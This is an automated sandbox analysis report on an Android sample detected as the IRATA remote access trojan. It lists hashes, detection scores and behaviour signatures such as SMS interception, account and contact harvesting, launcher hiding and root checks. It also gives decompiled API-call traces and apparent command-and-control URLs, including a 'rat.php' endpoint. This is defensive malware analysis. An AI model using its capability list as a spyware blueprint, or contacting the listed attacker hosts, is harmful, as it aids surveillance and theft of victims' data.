Loading Joe Sandbox Report ...

Edit tour

Android Analysis Report
LVgBOPCpI0

Overview

General Information

Sample Name:LVgBOPCpI0
Original Sample Name:2795bd8258cc8f0daa85db873c9f7e6126ec41f92a27970278b12ea4db5a4964
Analysis ID:1319345
MD5:d39f740d2de97df12a7ce73de153f397
SHA1:c669aeaf5548f74930d0b4bcdefa101de4b0726a
SHA256:2795bd8258cc8f0daa85db873c9f7e6126ec41f92a27970278b12ea4db5a4964
Infos:

Detection

Irata
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected IRATA
Antivirus / Scanner detection for submitted sample
Detected Irata
Removes its application launcher (likely to stay hidden)
Uses the command line tool ping to scan for other devices in the same network
Checks if a SIM card is installed
Queries the SIM provider numeric MCC+MNC (mobile country code + mobile network code)
Queries list of running processes/tasks
Queries SMS data
May use Google Cloud Messaging (GCM) or Google's Cloud to Device Messaging (C2DM) services
Obfuscates method names
Found parser code for incoming SMS (may be used to act on incoming SMS, BOT)
Has permission to read the SMS storage
Installs a new wake lock (to get activate on phone screen on)
Queries phone contact information
Found suspicious command strings (may be related to BOT commands)
Monitors incoming SMS
Sends SMS using SmsManager
Checks an internet connection is available
Queries list of installed packages
Checks if phone is rooted (checks for su binary)
Creates SMS data (e.g. PDU)
Requests potentially dangerous permissions
Checks if phone is rooted (checks for test-keys build tags)
Reads the incoming call number
Tries to detect Virtualbox
Queries the phones location (GPS)
Opens an internet connection
Queries the network operator name
May access the Android keyguard (lock screen)
Aborts a broadcast event (this is often done to hide phone events such as incoming SMS)
Parses SMS data (e.g. originating address)
Has permission to receive SMS in the background
Lists and deletes files in the same context
Queries email messages
Queries stored mail and application accounts (e.g. Gmail or Whatsup)
Queries the unqiue device ID (IMEI, MEID or ESN)
Kills/terminates processes
Queries the SIM provider ISO country code
Accesses android OS build fields
Executes native commands
Installs an application shortcut on the screen
Queries the Googlemail Account Name
Performs DNS lookups (Java API)
Queries several sensitive phone informations
Has permission to send SMS in the background
Queries the unique operating system id (ANDROID_ID)
Queries the WIFI MAC address
Has permission to execute code after phone reboot
Uses reflection

Classification

NameDescriptionAttributionBlogpost URLsLink
IRATAAccording to redpiranha, IRATA (Iranian Remote Access Trojan) Android Malware is a new malware detected in the wild. It originates from a phishing attack through SMS. The theme of the message resembles information coming from the government that will ask you to download this malicious application. IRATA can collect sensitive information from your mobile phone including bank details. Since it infects your mobile, it can also gather your SMS messages which then can be used to obtain 2FA tokens.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/apk.irata
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: LVgBOPCpI0ReversingLabs: Detection: 44%
Source: LVgBOPCpI0Virustotal: Detection: 53%Perma Link
Source: LVgBOPCpI0Avira: detected
Source: com.reza.sh.deviceinfo.DiviceInfo;->getLatLong:328API Call: android.location.LocationManager.getLastKnownLocation
Source: com.reza.sh.deviceinfo.DiviceInfo;->getLatLong:329API Call: android.location.LocationManager.getLastKnownLocation
Source: com.reza.sh.deviceinfo.DiviceInfo;->getLatLong:333API Call: android.location.LocationManager.getLastKnownLocation
Source: com.reza.sh.deviceinfo.DiviceInfo;->getLatLong:334API Call: android.location.Location.getLatitude
Source: com.reza.sh.deviceinfo.DiviceInfo;->getLatLong:335API Call: android.location.Location.getLongitude
Source: androidx.core.content.FileProvider;->parsePathStrategy:63API Call: android.os.Environment.getExternalStorageDirectory
Source: androidx.core.os.EnvironmentCompat;->getStorageState:2API Call: android.os.Environment.getExternalStorageState
Source: androidx.core.os.EnvironmentCompat;->getStorageState:5API Call: android.os.Environment.getExternalStorageDirectory
Source: androidx.core.os.EnvironmentCompat;->getStorageState:8API Call: android.os.Environment.getExternalStorageState
Source: anywheresoftware.b4a.objects.streams.File;->getDirDefaultExternal:183API Call: android.os.Environment.getExternalStorageDirectory
Source: anywheresoftware.b4a.objects.streams.File;->getDirRootExternal:201API Call: android.os.Environment.getExternalStorageDirectory
Source: anywheresoftware.b4a.objects.streams.File;->getExternalReadable:203API Call: android.os.Environment.getExternalStorageState
Source: anywheresoftware.b4a.objects.streams.File;->getExternalWritable:208API Call: android.os.Environment.getExternalStorageState

Networking

barindex
Source: com.MrXnxVip.global.main;->_vvvvvvvvvv5:23API Call: java.lang.Runtime.exec ping -c 2 -W 10 -v google.com
Source: com.google.firebase.messaging.SyncTask;->run:69API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.firebase.messaging.SyncTask;->run:69API Call: android.net.NetworkInfo.isConnected
Source: com.google.firebase.messaging.TopicsSyncTask;->run:70API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.firebase.messaging.TopicsSyncTask;->run:70API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.datatransport.cct.CctTransportBackend;->decorate:261API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.reza.sh.deviceinfo.DiviceInfo$Nettest;->doInBackground:8API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.reza.sh.deviceinfo.DiviceInfo$Nettest;->doInBackground:9API Call: android.net.NetworkInfo.isConnected
Source: com.reza.sh.deviceinfo.DiviceInfo;->getNetworkType:356API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.reza.sh.deviceinfo.DiviceInfo;->getWifiMAC:572API Call: android.net.wifi.WifiManager.getConnectionInfo
Source: com.reza.sh.deviceinfo.DiviceInfo;->isNetworkAvailable:612API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.reza.sh.deviceinfo.DiviceInfo;->isNetworkAvailable:613API Call: android.net.NetworkInfo.isConnected
Source: com.reza.sh.deviceinfo.DiviceInfo;->isWifiEnabled:617API Call: android.net.wifi.WifiManager.isWifiEnabled
Source: com.google.android.gms.measurement.internal.zzeo;->zzb:9API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.measurement.internal.zzeo;->zzb:10API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.measurement.internal.zzfl;->zzM:298API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.measurement.internal.zzfl;->zzM:299API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.datatransport.runtime.scheduling.jobscheduling.Uploader;->isNetworkAvailable:42API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.datatransport.runtime.scheduling.jobscheduling.Uploader;->isNetworkAvailable:43API Call: android.net.NetworkInfo.isConnected
Source: com.google.firebase.messaging.SyncTask;->isDeviceConnected:22API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.firebase.messaging.SyncTask;->isDeviceConnected:23API Call: android.net.NetworkInfo.isConnected
Source: com.google.firebase.messaging.TopicsSyncTask;->isDeviceConnected:46API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.firebase.messaging.TopicsSyncTask;->isDeviceConnected:47API Call: android.net.NetworkInfo.isConnected
Source: androidx.core.net.ConnectivityManagerCompat;->getNetworkInfoFromBroadcast:5API Call: android.net.ConnectivityManager.getNetworkInfo
Source: androidx.core.net.ConnectivityManagerCompat;->isActiveNetworkMetered:8API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: anywheresoftware.b4a.phone.PhoneEvents$2;->handle:6API Call: android.net.NetworkInfo.getState
Source: com.google.firebase.installations.remote.FirebaseInstallationServiceClient;->openHttpURLConnection:77API Call: java.net.URL.openConnection("https://firebaseinstallations.googleapis.com/v1/projects/developerbymrxnxvip/installations")
Source: okhttp3.internal.platform.Platform;->connectSocket:33API Call: java.net.Socket.connect("ssd-vip.website/104.21.33.223:443")
Source: com.google.android.datatransport.cct.CctTransportBackend;->doSend:14API Call: java.net.URL.openConnection (not executed)
Source: com.reza.sh.deviceinfo.DiviceInfo$Nettest;->doInBackground:12API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.ads.identifier.zza;->run:18API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.measurement.internal.zzeo;->zzc:11API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.measurement.internal.zzhr;->zzd:4API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.measurement.internal.zzkl;->connect:9API Call: javax.net.ssl.SSLSocket.connect (not executed)
Source: com.google.android.gms.measurement.internal.zzkl;->connect:11API Call: javax.net.ssl.SSLSocket.connect (not executed)
Source: com.google.firebase.messaging.ImageDownload;->blockingDownloadBytes:3API Call: java.net.URL.openConnection (not executed)
Source: okhttp3.internal.platform.AndroidPlatform;->connectSocket:61API Call: java.net.Socket.connect (not executed)
Source: okhttp3.Dns$Companion$DnsSystem;->lookup:4API Call: java.net.InetAddress.getAllByName (URL: "ssd-vip.website")
Source: okhttp3.Dns$Companion$DnsSystem;->lookup:4API Call: java.net.InetAddress.getAllByName (URL: "ssd-vip.website")
Source: okhttp3.Dns$Companion$DnsSystem;->lookup:4API Call: java.net.InetAddress.getAllByName (URL: "ssd-vip.website")
Source: com.reza.sh.deviceinfo.DiviceInfo$Nettest;->doInBackground:20API Call: java.net.HttpURLConnection.connect
Source: com.google.android.gms.measurement.internal.zzen;->run:37API Call: java.net.HttpURLConnection.connect
Source: notification_action.xml, androidString found in binary or memory: http://schemas.android.com/apk/res/android
Source: classes.dex, androidString found in binary or memory: http://www.google.com/
Source: 1.drString found in binary or memory: https://adl-jv.my03.com/rat.php
Source: classes.dex, androidString found in binary or memory: https://app-measurement.com/a
Source: classes.dex, androidString found in binary or memory: https://firebase.google.com/support/guides/disable-analytics
Source: classes.dexString found in binary or memory: https://firebase.google.com/support/guides/disable-analytics3App
Source: androidString found in binary or memory: https://firebase.google.com/support/privacy/init-options.
Source: androidString found in binary or memory: https://firebaseinstallations.googleapis.com/v1/projects/developerbymrxnxvip/installations
Source: classes.dex, androidString found in binary or memory: https://goo.gl/J1sWQy
Source: classes.dex, androidString found in binary or memory: https://goo.gl/NAOOOI
Source: classes.dexString found in binary or memory: https://goo.gl/NAOOOI&Missing
Source: classes.dex, androidString found in binary or memory: https://goo.gl/NAOOOI.
Source: classes.dex, androidString found in binary or memory: https://google.com/search?
Source: classes.dexString found in binary or memory: https://invalid-url/Ahttps://pagead2.googlesyndication.com/pagead/gen_204?id=gmob-apps
Source: NOTICEString found in binary or memory: https://mozilla.org/MPL/2.0/
Source: classes.dex, androidString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=gmob-apps
Source: classes.dex, androidString found in binary or memory: https://plus.google.com/
Source: NOTICEString found in binary or memory: https://publicsuffix.org/list/public_suffix_list.dat
Source: androidString found in binary or memory: https://ssd-vip.website/
Source: androidString found in binary or memory: https://ssd-vip.website/lord/log.php
Source: androidString found in binary or memory: https://ssd-vip.website/lord/web.txt
Source: classes.dex, androidString found in binary or memory: https://www.google.com
Source: classes.dexString found in binary or memory: https://www.google.comxhttps://www.googleadservices.com/pagead/conversion/app/deeplink?id_type=adid&
Source: classes.dex, androidString found in binary or memory: https://www.googleadservices.com/pagead/conversion/app/deeplink?id_type=adid&sdk_version=%s&rdid=%s&
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/appstate
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/datastoremobile
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/drive
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/drive.appdata
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/drive.apps
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/drive.file
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/drive.file5https://www.googleapis.com/auth/fitness.activity.read6htt
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.activity.read
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.activity.write
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.blood_glucose.read
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.blood_glucose.write
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.blood_pressure.read
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.blood_pressure.write
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.blood_pressure.write1https://www.googleapis.com/auth/fitness
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.body.read
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.body.write
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.body_temperature.read
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.body_temperature.write
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.body_temperature.write5https://www.googleapis.com/auth/fitne
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.location.read
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.location.write
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.nutrition.read
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.nutrition.write
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.oxygen_saturation.read
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.oxygen_saturation.read?https://www.googleapis.com/auth/fitne
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.oxygen_saturation.write
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.reproductive_health.read
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.reproductive_health.readAhttps://www.googleapis.com/auth/fit
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/fitness.reproductive_health.write
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/games
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/games.firstparty
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/games_lite
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/plus.login
Source: classes.dexString found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: submitted apkRequest permission: com.MrXnxVip.global.permission.C2D_MESSAGE
Source: anywheresoftware.b4a.phone.Phone$PhoneSms;->Send2:15API Call: android.telephony.SmsManager.sendTextMessage
Source: submitted apkRequest permission: android.permission.SEND_SMS
Source: androidx.documentfile.provider.RawDocumentFile;->deleteContents:5API Calls in same method context: File.listFiles,File.delete
Source: okhttp3.internal.io.FileSystem$Companion$SystemFileSystem;->deleteContents:25API Calls in same method context: File.listFiles,File.delete
Source: classes.dexString found in binary or memory: Landroid/app/KeyguardManager;
Source: classes.dexString found in binary or memory: Landroid/app/KeyguardManager;)Landroid/app/Notification$Action$Builder;!Landroid/app/Notification$Action;*Landroid/app/Notification$BigPictureStyle;'Landroid/app/Notification$BigTextStyle;1Landroid/app/Notification$BubbleMetadata$Builder;)Landroid/app/Notification$BubbleMetadata;"Landroid/app/Notification$Builder;3Landroid/app/Notification$DecoratedCustomViewStyle;%Landroid/app/Notification$InboxStyle;1Landroid/app/Notification$MessagingStyle$Message;)Landroid/app/Notification$MessagingStyle; Landroid/app/Notification$Style;
Source: classes.dexString found in binary or memory: inKeyguardRestrictedInputMode
Source: classes.dexString found in binary or memory: keyguard
Source: androidString found in binary or memory: keyguard
Source: androidx.core.app.JobIntentService$CompatWorkEnqueuer;->enqueueWork:27API Call: android.os.PowerManager$WakeLock.acquire
Source: androidx.core.app.JobIntentService$CompatWorkEnqueuer;->serviceProcessingFinished:29API Call: android.os.PowerManager$WakeLock.acquire
Source: androidx.core.app.JobIntentService$CompatWorkEnqueuer;->serviceProcessingStarted:33API Call: android.os.PowerManager$WakeLock.acquire
Source: androidx.legacy.content.WakefulBroadcastReceiver;->startWakefulService:32API Call: android.os.PowerManager$WakeLock.acquire
Source: com.google.firebase.messaging.SyncTask;->run:54API Call: android.os.PowerManager$WakeLock.acquire
Source: com.google.firebase.messaging.TopicsSyncTask;->run:56API Call: android.os.PowerManager$WakeLock.acquire
Source: anywheresoftware.b4a.objects.ServiceHelper$StarterHelper;->startServiceFromReceiver:116API Call: android.os.PowerManager$WakeLock.acquire
Source: anywheresoftware.b4a.phone.Phone$PhoneWakeState;->KeepAlive:11API Call: android.os.PowerManager$WakeLock.acquire
Source: anywheresoftware.b4a.phone.Phone$PhoneWakeState;->PartialLock:21API Call: android.os.PowerManager$WakeLock.acquire
Source: com.google.android.gms.stats.WakeLock;->acquire:88API Call: android.os.PowerManager$WakeLock.acquire
Source: submitted apkRequest permission: android.permission.INTERNET
Source: submitted apkRequest permission: android.permission.READ_SMS
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Source: submitted apkRequest permission: android.permission.SEND_SMS
Source: submitted apkRequest permission: android.permission.WAKE_LOCK
Source: anywheresoftware.b4a.BA;->ShowErrorMsgbox:303API Call: android.os.Process.killProcess
Source: com.MrXnxVip.global.main;->_vvvvvvvvvv5:23API Call: java.lang.Runtime.exec ("ping -c 2 -W 10 -v google.com")
Source: anywheresoftware.b4a.phone.Phone$LogCat$1;->run:4API Call: java.lang.Runtime.exec
Source: anywheresoftware.b4a.phone.Phone;->Shell:101API Call: java.lang.Runtime.exec
Source: anywheresoftware.b4a.phone.Phone;->Shell:103API Call: java.lang.Runtime.exec
Source: anywheresoftware.b4a.remotelogger.RemoteLogger$2;->run:5API Call: java.lang.Runtime.exec
Source: com.google.firebase.messaging.SharedPreferencesQueue;->initQueue:16API Call: "topic_operation_queue":
Source: com.google.firebase.messaging.Store;->getToken:48API Call: "|T|544782287671|*": null
Source: com.google.firebase.installations.local.IidStore;->readInstanceIdFromLocalStorage:56API Call: "|S|id": null
Source: com.google.firebase.installations.local.IidStore;->readPublicKeyFromLocalStorageAndCalculateInstanceId:60API Call: "|S||P|": null
Source: com.google.firebase.messaging.SharedPreferencesQueue;->initQueue:16API Call: "topic_operation_queue": S!lord,S!lord,S!lord,S!lord,S!lord,S!lord,S!lord,
Source: androidx.core.app.AppLaunchChecker;->hasStartedFromLauncher:5API Call: android.content.SharedPreferences.getBoolean
Source: androidx.core.app.AppLaunchChecker;->onActivityCreate:9API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.ads.identifier.zzb;->getBoolean:10API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.ads.identifier.zzb;->getString:22API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzea;->zzh:316API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.measurement.internal.zzes;->zza:6API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.measurement.internal.zzet;->zza:9API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzev;->zzb:73API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzew;->zza:6API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzex;->zzay:50API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.measurement.internal.zzex;->zzf:109API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.measurement.internal.zzex;->zzi:119API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzfl;->zza:537API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzfl;->zza:544API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzhn;->zzH:333API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzhn;->zzr:825API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.measurement.internal.zzjb;->zzD:155API Call: android.content.SharedPreferences.getBoolean
Source: com.google.firebase.internal.DataCollectionConfigStorage;->readAutoDataCollectionEnabled:15API Call: android.content.SharedPreferences.getBoolean
Source: com.google.firebase.installations.local.IidStore;->readToken:71API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.measurement.zzbr;->zzO:49API Call: android.content.SharedPreferences.getBoolean
Source: com.google.firebase.messaging.FirebaseMessaging$AutoInit;->readEnabled:10API Call: android.content.SharedPreferences.getBoolean
Source: com.google.firebase.messaging.MessagingAnalytics;->deliveryMetricsExportToBigQueryEnabled:10API Call: android.content.SharedPreferences.getBoolean
Source: classification engineClassification label: mal80.troj.spyw.evad.and@0/264@0/0
Source: anywheresoftware.b4a.phone.Phone$PhoneAccelerometer;->StartListening:14API Call: android.hardware.SensorManager.registerListener
Source: anywheresoftware.b4a.phone.Phone$PhoneOrientation;->StartListening:14API Call: android.hardware.SensorManager.registerListener
Source: anywheresoftware.b4a.phone.Phone$PhoneSensors;->StartListening:15API Call: android.hardware.SensorManager.registerListener
Source: fixed-LVgBOPCpI0Total valid method names: 65%
Source: com.google.android.gms.dynamite.DynamiteModule;->getLocalVersion:32API Call: Real call: public static final java.lang.String com.google.android.gms.dynamite.descriptors.com.google.android.gms.measurement.dynamite.ModuleDescriptor.MODULE_ID
Source: com.google.android.gms.dynamite.DynamiteModule;->zza:265API Call: Real call: public static java.lang.ClassLoader com.google.android.gms.dynamite.DynamiteModule$DynamiteLoaderClassLoader.sClassLoader
Source: anywheresoftware.b4a.BA;-><init>:32API Call: Real call: anywheresoftware.b4a.remotelogger.RemoteLogger@bc223c8
Source: anywheresoftware.b4a.BA;-><init>:32API Call: Real call: public void anywheresoftware.b4a.remotelogger.RemoteLogger.Start()
Source: com.MrXnxVip.global.starter;->onCreate:73API Call: Real call: public static void com.MrXnxVip.global.main.initializeProcessGlobals()
Source: com.google.android.gms.dynamic.ObjectWrapper;->unwrap:10API Call: Real call: private final java.lang.Object com.google.android.gms.dynamic.ObjectWrapper.a
Source: anywheresoftware.b4a.BA;->raiseEvent2:408API Call: Real call: public static java.lang.String com.MrXnxVip.global.starter._service_create() throws java.lang.Exception
Source: com.MrXnxVip.global.firebasemessaging;->onCreate:214API Call: Real call: public static void com.MrXnxVip.global.main.initializeProcessGlobals()
Source: com.MrXnxVip.global.httpjob;->innerInitialize:9API Call: Real call: java.lang.reflect.Field@e77a5e9
Source: com.MrXnxVip.global.httpjob;->innerInitialize:9API Call: Real call: java.lang.reflect.Field@c2f4d0f
Source: com.MrXnxVip.global.httpjob;->innerInitialize:9API Call: Real call: java.lang.reflect.Field@d1dab2b
Source: anywheresoftware.b4a.BA;->raiseEvent2:408API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._class_globals() throws java.lang.Exception
Source: anywheresoftware.b4a.BA;->raiseEvent2:408API Call: Real call: public static void com.MrXnxVip.global.firebasemessaging._service_start(anywheresoftware.b4a.objects.IntentWrapper) throws java.lang.Exception
Source: anywheresoftware.b4a.BA;->raiseEvent2:408API Call: Real call: public static java.lang.String com.MrXnxVip.global.main._globals() throws java.lang.Exception
Source: anywheresoftware.b4a.DynamicBuilder;->build:17API Call: Real call: null
Source: anywheresoftware.b4a.DynamicBuilder;->build:17API Call: Real call: public static android.graphics.drawable.Drawable anywheresoftware.b4a.objects.drawable.ColorDrawable.build(java.lang.Object,java.util.HashMap,boolean,java.lang.Object)
Source: anywheresoftware.b4a.DynamicBuilder;->build:17API Call: Real call: null
Source: anywheresoftware.b4a.DynamicBuilder;->build:17API Call: Real call: public static android.view.View anywheresoftware.b4a.objects.ActivityWrapper.build(java.lang.Object,java.util.HashMap,boolean,java.lang.Object) throws java.lang.Exception
Source: anywheresoftware.b4a.DynamicBuilder;->build:17API Call: Real call: null
Source: anywheresoftware.b4a.DynamicBuilder;->build:17API Call: Real call: public static android.view.View anywheresoftware.b4a.objects.WebViewWrapper.build(java.lang.Object,java.util.HashMap,boolean,java.lang.Object) throws java.lang.Exception
Source: anywheresoftware.b4a.keywords.LayoutBuilder;->runScriptMethod:247API Call: Real call: null
Source: anywheresoftware.b4a.keywords.LayoutBuilder;->runScriptMethod:247API Call: Real call: public static void com.MrXnxVip.global.designerscripts.LS_layout.LS_general(anywheresoftware.b4a.BA,android.view.View,anywheresoftware.b4a.keywords.LayoutValues,java.util.Map,java.util.Map,int,int,float) throws java.lang.Exception
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@e336379
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@558ad1f
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@fe4fc3b
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@bd908b1
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@5f4d196
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@8464904
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@d247122
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@f60f170
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@cbc7d6e
Source: anywheresoftware.b4a.BA;->raiseEvent2:408API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._class_globals() throws java.lang.Exception
Source: com.MrXnxVip.global.main;->afterFirstLayout:82API Call: Real call: public void android.app.Activity.invalidateOptionsMenu()
Source: anywheresoftware.b4a.keywords.Common;->getComponentBA:463API Call: Real call: public static anywheresoftware.b4a.BA com.MrXnxVip.global.firebasemessaging.processBA
Source: anywheresoftware.b4a.keywords.Common;->getComponentBA:463API Call: Real call: public static anywheresoftware.b4a.BA com.MrXnxVip.global.httputils2service.processBA
Source: anywheresoftware.b4a.keywords.Common$12;->run:36API Call: Real call: static com.MrXnxVip.global.httputils2service com.MrXnxVip.global.httputils2service.mostCurrent
Source: com.MrXnxVip.global.newmessage1;->onCreate:191API Call: Real call: public static void com.MrXnxVip.global.main.initializeProcessGlobals()
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@97a6ea2
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@424eaf0
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@f05c61c
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@c1f2ffa
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@f41c9ab
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@d5eaba1
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@d15587
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@49960dd
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@8bfc452
Source: anywheresoftware.b4a.BA;->raiseEvent2:408API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._class_globals() throws java.lang.Exception
Source: anywheresoftware.b4a.objects.ServiceHelper$StarterHelper;->startServiceFromReceiver:105API Call: Real call: public static boolean com.MrXnxVip.global.main.isAnyActivityVisible()
Source: com.MrXnxVip.global.httputils2service;->onReceive:153API Call: Real call: public static void com.MrXnxVip.global.main.initializeProcessGlobals()
Source: anywheresoftware.b4a.keywords.Common;->getComponentBA:463API Call: Real call: public static anywheresoftware.b4a.BA com.MrXnxVip.global.httputils2service.processBA
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvv0
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvv2
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public boolean com.MrXnxVip.global.httpjob._vvvvvvvv3
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.Object com.MrXnxVip.global.httpjob._vvvvvvvv7
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public com.MrXnxVip.global.firebasemessaging com.MrXnxVip.global.httpjob._vvvvvvvvv0
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest com.MrXnxVip.global.httpjob._vvvvvvvvv1
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse com.MrXnxVip.global.httpjob._vvvvvvvvv2
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.Object com.MrXnxVip.global.httpjob._vvvvvvvvv3
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvvv4
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvvv5
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvv0
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvv2
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public boolean com.MrXnxVip.global.httpjob._vvvvvvvv3
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.Object com.MrXnxVip.global.httpjob._vvvvvvvv7
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public com.MrXnxVip.global.firebasemessaging com.MrXnxVip.global.httpjob._vvvvvvvvv0
